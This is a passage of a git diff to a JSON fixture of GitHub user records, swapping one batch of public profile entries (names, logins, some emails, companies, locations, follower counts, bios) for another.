source.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1428, + "pk": 6710, "fields": { - "nest_created_at": "2024-09-11T23:27:13.281Z", - "nest_updated_at": "2024-09-11T23:27:13.281Z", - "name": "Mirko Friedenhagen", - "login": "mfriedenhagen", + "nest_created_at": "2024-09-22T07:47:47.496Z", + "nest_updated_at": "2024-09-22T18:50:21.143Z", + "name": "Martin W. Kirst", + "login": "nitram509", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/125281?v=4", - "company": "", - "location": "Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/1189394?v=4", + "company": "Oliver Wyman", + "location": "GERMANY", "collaborators_count": 0, - "following_count": 9, - "followers_count": 68, + "following_count": 17, + "followers_count": 87, "public_gists_count": 6, - "public_repositories_count": 145, - "created_at": "2009-09-10T09:46:32Z", - "updated_at": "2024-08-11T06:18:24Z", - "node_id": "MDQ6VXNlcjEyNTI4MQ==", + "public_repositories_count": 146, + "created_at": "2011-11-11T21:32:15Z", + "updated_at": "2024-09-17T11:21:10Z", + "node_id": "MDQ6VXNlcjExODkzOTQ=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "nitram509" } }, { "model": "github.user", - "pk": 1429, + "pk": 6711, "fields": { - "nest_created_at": "2024-09-11T23:27:14.100Z", - "nest_updated_at": "2024-09-11T23:27:14.100Z", + "nest_created_at": "2024-09-22T07:47:47.817Z", + "nest_updated_at": "2024-09-22T18:50:21.450Z", "name": "", - "login": "richardTingle", + "login": "michaltalaga", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6330028?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10220151?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2014-01-06T13:09:52Z", - "updated_at": "2024-01-01T10:43:00Z", - "node_id": "MDQ6VXNlcjYzMzAwMjg=", + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2014-12-17T11:26:52Z", + "updated_at": "2024-09-15T05:47:52Z", + "node_id": "MDQ6VXNlcjEwMjIwMTUx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395978,24 +653702,24 @@ }, { "model": "github.user", - "pk": 1430, + "pk": 6712, "fields": { - "nest_created_at": "2024-09-11T23:27:15.764Z", - "nest_updated_at": "2024-09-11T23:27:16.621Z", - "name": "", - "login": "Swapnil-CSI", + "nest_created_at": "2024-09-22T07:47:48.123Z", + "nest_updated_at": "2024-09-22T18:50:21.757Z", + "name": "dpfg", + "login": "dpfg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87305526?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/159314?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, + "public_gists_count": 13, "public_repositories_count": 2, - "created_at": "2021-07-12T09:13:26Z", - "updated_at": "2024-01-23T07:00:37Z", - "node_id": "MDQ6VXNlcjg3MzA1NTI2", + "created_at": "2009-11-28T22:53:45Z", + "updated_at": "2024-09-16T14:44:26Z", + "node_id": "MDQ6VXNlcjE1OTMxNA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396003,49 +653727,49 @@ }, { "model": "github.user", - "pk": 1431, + "pk": 6713, "fields": { - "nest_created_at": "2024-09-11T23:27:18.372Z", - "nest_updated_at": "2024-09-11T23:27:18.372Z", - "name": "toaomalkster", - "login": "toaomalkster", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12741661?v=4", - "company": "", - "location": "Chennai, India", + "nest_created_at": "2024-09-22T07:47:48.429Z", + "nest_updated_at": "2024-09-22T18:50:22.068Z", + "name": "Wratko Hlavina", + "login": "whlavina", + "email": "whlavina@ncbi.nlm.nih.gov", + "avatar_url": "https://avatars.githubusercontent.com/u/6211554?v=4", + "company": "NCBI/NLM/NIH", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 26, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2015-06-04T04:01:37Z", - "updated_at": "2024-08-28T11:37:06Z", - "node_id": "MDQ6VXNlcjEyNzQxNjYx", - "bio": "Software Engineer. In my spare time I study Consciousness from a scientific point of view.\r\n\r\nPreviously based in Wellington, New Zealand.", + "public_repositories_count": 2, + "created_at": "2013-12-18T04:49:41Z", + "updated_at": "2024-04-24T18:45:07Z", + "node_id": "MDQ6VXNlcjYyMTE1NTQ=", + "bio": "Technical Program Manager,\r\nSequence Enhancements, Tools, and Delivery;\r\nNational Center for Biotechnology Information,\r\nNational Library of Medicine", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1432, + "pk": 6714, "fields": { - "nest_created_at": "2024-09-11T23:27:19.239Z", - "nest_updated_at": "2024-09-12T01:12:42.618Z", - "name": "", - "login": "ludan-nin", + "nest_created_at": "2024-09-22T07:47:48.757Z", + "nest_updated_at": "2024-09-22T18:50:22.384Z", + "name": "Vasko Bozhurski", + "login": "VaskoBozhurski", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84755351?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/39486845?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 9, - "followers_count": 0, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2021-05-25T01:51:31Z", - "updated_at": "2024-04-15T07:14:36Z", - "node_id": "MDQ6VXNlcjg0NzU1MzUx", + "public_repositories_count": 1, + "created_at": "2018-05-21T11:46:45Z", + "updated_at": "2024-09-13T14:12:09Z", + "node_id": "MDQ6VXNlcjM5NDg2ODQ1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396053,124 +653777,124 @@ }, { "model": "github.user", - "pk": 1433, + "pk": 6715, "fields": { - "nest_created_at": "2024-09-11T23:27:20.074Z", - "nest_updated_at": "2024-09-11T23:27:20.912Z", - "name": "Bruce Coveny", - "login": "bcoveny", + "nest_created_at": "2024-09-22T07:47:49.096Z", + "nest_updated_at": "2024-09-22T18:50:22.702Z", + "name": "Theo Ribeiro", + "login": "theoribeiro", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8987322?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/41117224?v=4", "company": "", - "location": "Sauquiot, NY", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, + "following_count": 1, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2014-10-01T17:07:12Z", - "updated_at": "2024-08-08T10:08:55Z", - "node_id": "MDQ6VXNlcjg5ODczMjI=", + "public_repositories_count": 26, + "created_at": "2018-07-11T13:09:34Z", + "updated_at": "2024-06-28T20:24:24Z", + "node_id": "MDQ6VXNlcjQxMTE3MjI0", "bio": "", "is_hireable": false, - "twitter_username": "bruce_coveny" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1434, + "pk": 6716, "fields": { - "nest_created_at": "2024-09-11T23:27:22.198Z", - "nest_updated_at": "2024-09-12T01:42:37.842Z", - "name": "Abdel Hajou", - "login": "AbdelHajou", - "email": "abdelwhajou@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/62144407?v=4", - "company": "Info Support", - "location": "Veenendaal, The Netherlands", + "nest_created_at": "2024-09-22T07:47:49.419Z", + "nest_updated_at": "2024-09-22T18:50:23.007Z", + "name": "", + "login": "tajnymag", + "email": "tajnymag@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3985946?v=4", + "company": "Sator Controls", + "location": "Prague", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2020-03-13T13:43:35Z", - "updated_at": "2024-09-01T12:06:30Z", - "node_id": "MDQ6VXNlcjYyMTQ0NDA3", - "bio": "IT Consultant at Info Support", + "following_count": 12, + "followers_count": 60, + "public_gists_count": 20, + "public_repositories_count": 66, + "created_at": "2013-03-27T14:33:30Z", + "updated_at": "2024-09-17T13:29:16Z", + "node_id": "MDQ6VXNlcjM5ODU5NDY=", + "bio": "Grad student at VSB Technical University of Ostrava with a passion for the open web.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1435, + "pk": 6717, "fields": { - "nest_created_at": "2024-09-11T23:27:23.040Z", - "nest_updated_at": "2024-09-11T23:27:23.040Z", - "name": "XenoAmess", - "login": "XenoAmess", - "email": "xenoamess@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/17455337?v=4", + "nest_created_at": "2024-09-22T07:47:49.749Z", + "nest_updated_at": "2024-09-22T18:50:23.313Z", + "name": "Stephan Schreiber", + "login": "Septh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11949623?v=4", "company": "", - "location": "", + "location": "Paris, France", "collaborators_count": 0, - "following_count": 84, - "followers_count": 128, + "following_count": 0, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 67, - "created_at": "2016-02-24T15:16:56Z", - "updated_at": "2024-09-08T01:13:07Z", - "node_id": "MDQ6VXNlcjE3NDU1MzM3", - "bio": "I get to know the missing of comments and documents can be really harmful recently, and I would find some time to add more detailed comments to my projects.THX.", + "public_repositories_count": 33, + "created_at": "2015-04-14T19:33:16Z", + "updated_at": "2024-09-13T12:34:52Z", + "node_id": "MDQ6VXNlcjExOTQ5NjIz", + "bio": "Amateur programmer since 1986.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1436, + "pk": 6718, "fields": { - "nest_created_at": "2024-09-11T23:27:23.841Z", - "nest_updated_at": "2024-09-11T23:27:23.841Z", - "name": "Brad Giaccio", - "login": "bgiaccio", + "nest_created_at": "2024-09-22T07:47:50.062Z", + "nest_updated_at": "2024-09-22T18:50:23.623Z", + "name": "Sheetal Nandi", + "login": "sheetalkamat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12596046?v=4", - "company": "@Berico-Technologies", + "avatar_url": "https://avatars.githubusercontent.com/u/8052792?v=4", + "company": "Microsoft", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 3, - "public_repositories_count": 6, - "created_at": "2015-05-25T12:27:05Z", - "updated_at": "2024-07-31T14:12:14Z", - "node_id": "MDQ6VXNlcjEyNTk2MDQ2", + "followers_count": 656, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-07-02T23:35:52Z", + "updated_at": "2024-09-03T17:14:20Z", + "node_id": "MDQ6VXNlcjgwNTI3OTI=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sheetalkamat" } }, { "model": "github.user", - "pk": 1437, + "pk": 6719, "fields": { - "nest_created_at": "2024-09-11T23:27:24.657Z", - "nest_updated_at": "2024-09-11T23:27:24.657Z", - "name": "Jörg Hohwiller", - "login": "hohwille", + "nest_created_at": "2024-09-22T07:47:50.388Z", + "nest_updated_at": "2024-09-22T18:50:23.932Z", + "name": "Sergey Simonchik", + "login": "segrey", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1923119?v=4", - "company": "", - "location": "Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/607109?v=4", + "company": "JetBrains", + "location": "Munich, Germany", "collaborators_count": 0, - "following_count": 32, - "followers_count": 42, - "public_gists_count": 2, - "public_repositories_count": 42, - "created_at": "2012-07-04T18:47:24Z", - "updated_at": "2024-08-20T11:24:00Z", - "node_id": "MDQ6VXNlcjE5MjMxMTk=", + "following_count": 1, + "followers_count": 15, + "public_gists_count": 1, + "public_repositories_count": 50, + "created_at": "2011-02-08T16:36:25Z", + "updated_at": "2024-08-05T18:48:37Z", + "node_id": "MDQ6VXNlcjYwNzEwOQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396178,49 +653902,49 @@ }, { "model": "github.user", - "pk": 1438, + "pk": 6720, "fields": { - "nest_created_at": "2024-09-11T23:27:25.515Z", - "nest_updated_at": "2024-09-11T23:27:25.515Z", - "name": "Martin Husted Hartvig", - "login": "HagarJNode", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2697227?v=4", + "nest_created_at": "2024-09-22T07:47:50.712Z", + "nest_updated_at": "2024-09-22T18:50:24.245Z", + "name": "Sergey Petrov", + "login": "Pr0Ger", + "email": "me@pr0ger.org", + "avatar_url": "https://avatars.githubusercontent.com/u/232005?v=4", "company": "", - "location": "Denmark", + "location": "Tbilisi", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2012-11-01T07:56:58Z", - "updated_at": "2024-08-29T08:20:18Z", - "node_id": "MDQ6VXNlcjI2OTcyMjc=", - "bio": "", + "following_count": 21, + "followers_count": 47, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2010-03-28T13:17:12Z", + "updated_at": "2024-07-14T20:20:26Z", + "node_id": "MDQ6VXNlcjIzMjAwNQ==", + "bio": "Professional pizza consumer and mediocre code writer", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Pr0Ger" } }, { "model": "github.user", - "pk": 1439, + "pk": 6721, "fields": { - "nest_created_at": "2024-09-11T23:27:26.351Z", - "nest_updated_at": "2024-09-11T23:27:26.352Z", - "name": "Carsten Rohde", - "login": "caroso-de", + "nest_created_at": "2024-09-22T07:47:51.018Z", + "nest_updated_at": "2024-09-22T18:50:24.585Z", + "name": "", + "login": "skshetry", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15255111?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18718008?v=4", "company": "", - "location": "", + "location": "Nepal", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2015-10-22T21:28:04Z", - "updated_at": "2024-07-09T12:20:48Z", - "node_id": "MDQ6VXNlcjE1MjU1MTEx", + "following_count": 28, + "followers_count": 87, + "public_gists_count": 18, + "public_repositories_count": 119, + "created_at": "2016-04-28T10:18:51Z", + "updated_at": "2024-09-19T14:47:12Z", + "node_id": "MDQ6VXNlcjE4NzE4MDA4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396228,74 +653952,74 @@ }, { "model": "github.user", - "pk": 1440, + "pk": 6722, "fields": { - "nest_created_at": "2024-09-11T23:27:27.153Z", - "nest_updated_at": "2024-09-11T23:27:27.153Z", - "name": "mergebase.com", - "login": "juliusmusseau", + "nest_created_at": "2024-09-22T07:47:51.335Z", + "nest_updated_at": "2024-09-22T18:50:24.892Z", + "name": "Samrith Shankar", + "login": "samrith-s", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41974443?v=4", - "company": "Mergebase", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9032162?v=4", + "company": "", + "location": "Mumbai, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2018-07-31T23:03:30Z", - "updated_at": "2024-09-02T21:09:12Z", - "node_id": "MDQ6VXNlcjQxOTc0NDQz", - "bio": "Securing software supply chains!", - "is_hireable": false, - "twitter_username": "" + "following_count": 1, + "followers_count": 33, + "public_gists_count": 2, + "public_repositories_count": 62, + "created_at": "2014-10-06T06:18:16Z", + "updated_at": "2024-09-20T11:34:06Z", + "node_id": "MDQ6VXNlcjkwMzIxNjI=", + "bio": "🚀", + "is_hireable": true, + "twitter_username": "samrithshankar" } }, { "model": "github.user", - "pk": 1441, + "pk": 6723, "fields": { - "nest_created_at": "2024-09-11T23:27:27.986Z", - "nest_updated_at": "2024-09-11T23:27:27.986Z", - "name": "", - "login": "tobinbrooke", + "nest_created_at": "2024-09-22T07:47:51.651Z", + "nest_updated_at": "2024-09-22T18:50:25.249Z", + "name": "Sam Verschueren", + "login": "SamVerschueren", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51296294?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1913805?v=4", + "company": "@stackblitz ", + "location": "Bruges", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2019-06-02T17:02:49Z", - "updated_at": "2024-02-22T19:47:15Z", - "node_id": "MDQ6VXNlcjUxMjk2Mjk0", + "following_count": 24, + "followers_count": 734, + "public_gists_count": 14, + "public_repositories_count": 305, + "created_at": "2012-07-02T11:32:26Z", + "updated_at": "2024-08-07T09:01:32Z", + "node_id": "MDQ6VXNlcjE5MTM4MDU=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "SamVerschueren" } }, { "model": "github.user", - "pk": 1442, + "pk": 6724, "fields": { - "nest_created_at": "2024-09-11T23:27:28.813Z", - "nest_updated_at": "2024-09-11T23:27:28.813Z", - "name": "Roman Huber", - "login": "alerosmile", + "nest_created_at": "2024-09-22T07:47:51.971Z", + "nest_updated_at": "2024-09-22T18:50:25.564Z", + "name": "Markus Cozowicz", + "login": "eisber", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26764588?v=4", - "company": "", - "location": "St. Margrethen, Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/10142286?v=4", + "company": "Microsoft", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 4, + "followers_count": 50, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2017-03-29T09:58:10Z", - "updated_at": "2024-07-14T19:20:42Z", - "node_id": "MDQ6VXNlcjI2NzY0NTg4", + "public_repositories_count": 67, + "created_at": "2014-12-10T12:59:56Z", + "updated_at": "2024-09-18T12:02:11Z", + "node_id": "MDQ6VXNlcjEwMTQyMjg2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396303,74 +654027,99 @@ }, { "model": "github.user", - "pk": 1443, + "pk": 6725, "fields": { - "nest_created_at": "2024-09-11T23:27:32.157Z", - "nest_updated_at": "2024-09-12T01:42:31.662Z", - "name": "", - "login": "redaabdellah21", + "nest_created_at": "2024-09-22T07:47:52.298Z", + "nest_updated_at": "2024-09-22T18:50:25.884Z", + "name": "Geoffroy Empain", + "login": "gempain", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43956285?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13135149?v=4", + "company": "Charlie Bravo", + "location": "Belgium", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 1, + "followers_count": 26, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2018-10-08T11:13:58Z", - "updated_at": "2023-09-10T11:44:55Z", - "node_id": "MDQ6VXNlcjQzOTU2Mjg1", - "bio": "", + "public_repositories_count": 10, + "created_at": "2015-07-01T12:37:06Z", + "updated_at": "2024-09-17T06:00:43Z", + "node_id": "MDQ6VXNlcjEzMTM1MTQ5", + "bio": "Full stack developer driven by passion and powered by challenge, I try to build things that save time to others and make their life more simple", "is_hireable": false, - "twitter_username": "" + "twitter_username": "gempain" } }, { "model": "github.user", - "pk": 1444, + "pk": 6726, "fields": { - "nest_created_at": "2024-09-11T23:27:32.991Z", - "nest_updated_at": "2024-09-11T23:27:32.991Z", - "name": "Josua", - "login": "SemmelJochen", + "nest_created_at": "2024-09-22T07:47:52.611Z", + "nest_updated_at": "2024-09-22T18:50:26.205Z", + "name": "Gant Laborde", + "login": "GantMan", + "email": "gantman@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/997157?v=4", + "company": "Infinite Red", + "location": "New Orleans", + "collaborators_count": 0, + "following_count": 164, + "followers_count": 1232, + "public_gists_count": 105, + "public_repositories_count": 329, + "created_at": "2011-08-22T19:48:18Z", + "updated_at": "2024-05-01T19:30:30Z", + "node_id": "MDQ6VXNlcjk5NzE1Nw==", + "bio": "Outlandish philosopher, writer, public speaker turned mad scientist. Passion for research and teaching, I get to create everyday.", + "is_hireable": false, + "twitter_username": "GantLaborde" + } +}, +{ + "model": "github.user", + "pk": 6727, + "fields": { + "nest_created_at": "2024-09-22T07:47:52.920Z", + "nest_updated_at": "2024-09-22T18:50:26.516Z", + "name": "Florian Verdonck", + "login": "nojaf", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43446941?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2621499?v=4", "company": "", - "location": "Münster, Germany", + "location": "Ypres", "collaborators_count": 0, - "following_count": 3, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2018-09-20T15:14:23Z", - "updated_at": "2024-08-22T09:01:07Z", - "node_id": "MDQ6VXNlcjQzNDQ2OTQx", - "bio": "coding from home", - "is_hireable": false, - "twitter_username": "" + "following_count": 107, + "followers_count": 115, + "public_gists_count": 62, + "public_repositories_count": 199, + "created_at": "2012-10-22T12:19:26Z", + "updated_at": "2024-09-03T08:33:21Z", + "node_id": "MDQ6VXNlcjI2MjE0OTk=", + "bio": "", + "is_hireable": true, + "twitter_username": "verdonckflorian" } }, { "model": "github.user", - "pk": 1445, + "pk": 6728, "fields": { - "nest_created_at": "2024-09-11T23:27:33.829Z", - "nest_updated_at": "2024-09-11T23:27:33.829Z", - "name": "Anders Båtstrand", - "login": "anderius", + "nest_created_at": "2024-09-22T07:47:53.230Z", + "nest_updated_at": "2024-09-22T18:50:26.841Z", + "name": "Florian Imdahl", + "login": "ffflorian", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/917734?v=4", - "company": "Anders Båtstrand AS", - "location": "Tønsberg", + "avatar_url": "https://avatars.githubusercontent.com/u/5497598?v=4", + "company": "Deutsche Bahn", + "location": "Berlin", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 6, - "created_at": "2011-07-15T13:43:33Z", - "updated_at": "2023-08-16T11:36:47Z", - "node_id": "MDQ6VXNlcjkxNzczNA==", + "following_count": 25, + "followers_count": 93, + "public_gists_count": 33, + "public_repositories_count": 112, + "created_at": "2013-09-19T21:50:44Z", + "updated_at": "2024-09-05T05:29:47Z", + "node_id": "MDQ6VXNlcjU0OTc1OTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396378,24 +654127,24 @@ }, { "model": "github.user", - "pk": 1446, + "pk": 6729, "fields": { - "nest_created_at": "2024-09-11T23:27:34.671Z", - "nest_updated_at": "2024-09-11T23:27:34.671Z", - "name": "Henrik Plate", - "login": "henrikplate", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17928867?v=4", - "company": "@endorlabs ", - "location": "France", + "nest_created_at": "2024-09-22T07:47:53.540Z", + "nest_updated_at": "2024-09-22T18:50:27.153Z", + "name": "Fabio Cavalcante", + "login": "fabiocav", + "email": "fabio.cavalcante@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2507935?v=4", + "company": "Microsoft", + "location": "Redmond, WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 15, - "public_gists_count": 3, - "public_repositories_count": 16, - "created_at": "2016-03-18T13:40:42Z", - "updated_at": "2024-08-22T07:38:47Z", - "node_id": "MDQ6VXNlcjE3OTI4ODY3", + "following_count": 4, + "followers_count": 141, + "public_gists_count": 7, + "public_repositories_count": 98, + "created_at": "2012-10-08T00:43:05Z", + "updated_at": "2024-06-18T10:01:38Z", + "node_id": "MDQ6VXNlcjI1MDc5MzU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396403,24 +654152,24 @@ }, { "model": "github.user", - "pk": 1447, + "pk": 6730, "fields": { - "nest_created_at": "2024-09-11T23:27:37.262Z", - "nest_updated_at": "2024-09-11T23:27:38.090Z", - "name": "Kevin Conner", - "login": "knrc", + "nest_created_at": "2024-09-22T07:47:53.851Z", + "nest_updated_at": "2024-09-22T18:50:27.456Z", + "name": "Elvis Shi", + "login": "Elvis-Shi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/701297?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45674121?v=4", + "company": "Microsoft Corporation", + "location": "Redmond", "collaborators_count": 0, "following_count": 0, - "followers_count": 25, - "public_gists_count": 4, - "public_repositories_count": 126, - "created_at": "2011-03-31T10:29:06Z", - "updated_at": "2024-09-06T17:19:11Z", - "node_id": "MDQ6VXNlcjcwMTI5Nw==", + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2018-12-06T23:05:49Z", + "updated_at": "2024-06-10T19:07:31Z", + "node_id": "MDQ6VXNlcjQ1Njc0MTIx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396428,24 +654177,49 @@ }, { "model": "github.user", - "pk": 1448, + "pk": 6731, "fields": { - "nest_created_at": "2024-09-11T23:27:38.919Z", - "nest_updated_at": "2024-09-11T23:27:38.919Z", - "name": "Pascal Groß", - "login": "interN3rd", + "nest_created_at": "2024-09-22T07:47:54.168Z", + "nest_updated_at": "2024-09-22T18:50:27.772Z", + "name": "Dominik Moritz", + "login": "domoritz", + "email": "domoritz@cmu.edu", + "avatar_url": "https://avatars.githubusercontent.com/u/589034?v=4", + "company": "CMU, Apple", + "location": "Pittsburgh", + "collaborators_count": 0, + "following_count": 59, + "followers_count": 1223, + "public_gists_count": 95, + "public_repositories_count": 390, + "created_at": "2011-01-28T20:53:59Z", + "updated_at": "2024-09-19T12:12:00Z", + "node_id": "MDQ6VXNlcjU4OTAzNA==", + "bio": "Faculty at CMU (@cmudig) and researcher at @apple. PhD in Computer Science from the University of Washington (@uwdata, @uwdb). Co-creator @vega, @streamlit.\r\n", + "is_hireable": false, + "twitter_username": "domoritz" + } +}, +{ + "model": "github.user", + "pk": 6732, + "fields": { + "nest_created_at": "2024-09-22T07:47:54.481Z", + "nest_updated_at": "2024-09-22T18:50:28.079Z", + "name": "Dirk Bolte", + "login": "dirkbolte", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44261334?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1572945?v=4", "company": "", - "location": "", + "location": "Karlsruhe, Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, + "following_count": 3, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2018-10-18T10:47:38Z", - "updated_at": "2024-08-12T09:49:04Z", - "node_id": "MDQ6VXNlcjQ0MjYxMzM0", + "public_repositories_count": 14, + "created_at": "2012-03-25T09:57:32Z", + "updated_at": "2024-08-14T05:45:39Z", + "node_id": "MDQ6VXNlcjE1NzI5NDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396453,24 +654227,24 @@ }, { "model": "github.user", - "pk": 1449, + "pk": 6733, "fields": { - "nest_created_at": "2024-09-11T23:27:40.969Z", - "nest_updated_at": "2024-09-11T23:27:40.969Z", - "name": "", - "login": "savu-a", + "nest_created_at": "2024-09-22T07:47:54.796Z", + "nest_updated_at": "2024-09-22T18:50:28.388Z", + "name": "David Fong", + "login": "david-fong", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/123734715?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42986768?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-01-27T10:52:06Z", - "updated_at": "2024-06-21T08:26:32Z", - "node_id": "U_kgDOB2AKuw", + "following_count": 84, + "followers_count": 28, + "public_gists_count": 3, + "public_repositories_count": 23, + "created_at": "2018-09-05T01:15:18Z", + "updated_at": "2024-08-31T05:43:16Z", + "node_id": "MDQ6VXNlcjQyOTg2NzY4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -396478,74 +654252,74 @@ }, { "model": "github.user", - "pk": 1450, + "pk": 6734, "fields": { - "nest_created_at": "2024-09-11T23:27:43.056Z", - "nest_updated_at": "2024-09-12T02:08:10.616Z", - "name": "Michael Keppler", - "login": "Bananeweizen", + "nest_created_at": "2024-09-22T07:47:55.109Z", + "nest_updated_at": "2024-09-22T18:50:28.706Z", + "name": "Daniel W. Hieber", + "login": "dwhieb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/406876?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5892997?v=4", "company": "", - "location": "Stuttgart, Germany", + "location": "Chicago, IL", "collaborators_count": 0, - "following_count": 17, - "followers_count": 53, - "public_gists_count": 2, - "public_repositories_count": 140, - "created_at": "2010-09-19T09:56:02Z", - "updated_at": "2024-08-23T11:48:19Z", - "node_id": "MDQ6VXNlcjQwNjg3Ng==", - "bio": "Passionate open source developer with strong opinions about clean code.", + "following_count": 141, + "followers_count": 60, + "public_gists_count": 4, + "public_repositories_count": 17, + "created_at": "2013-11-09T00:27:16Z", + "updated_at": "2024-05-19T03:35:51Z", + "node_id": "MDQ6VXNlcjU4OTI5OTc=", + "bio": "I'm a diversity linguist documenting the world's endangered languages.", "is_hireable": false, - "twitter_username": "bananeweizen" + "twitter_username": "dwhieb" } }, { "model": "github.user", - "pk": 1451, + "pk": 6735, "fields": { - "nest_created_at": "2024-09-11T23:27:43.866Z", - "nest_updated_at": "2024-09-11T23:27:43.866Z", - "name": "Alexey Loubyansky", - "login": "aloubyansky", + "nest_created_at": "2024-09-22T07:47:55.424Z", + "nest_updated_at": "2024-09-22T18:50:29.014Z", + "name": "Daniel Kurzynski", + "login": "daniel-kurzynski", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/323379?v=4", - "company": "Red Hat", - "location": "Neuchatel, Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/4758527?v=4", + "company": "@SAP", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 49, - "public_gists_count": 1, - "public_repositories_count": 86, - "created_at": "2010-07-05T15:13:06Z", - "updated_at": "2024-08-31T17:32:45Z", - "node_id": 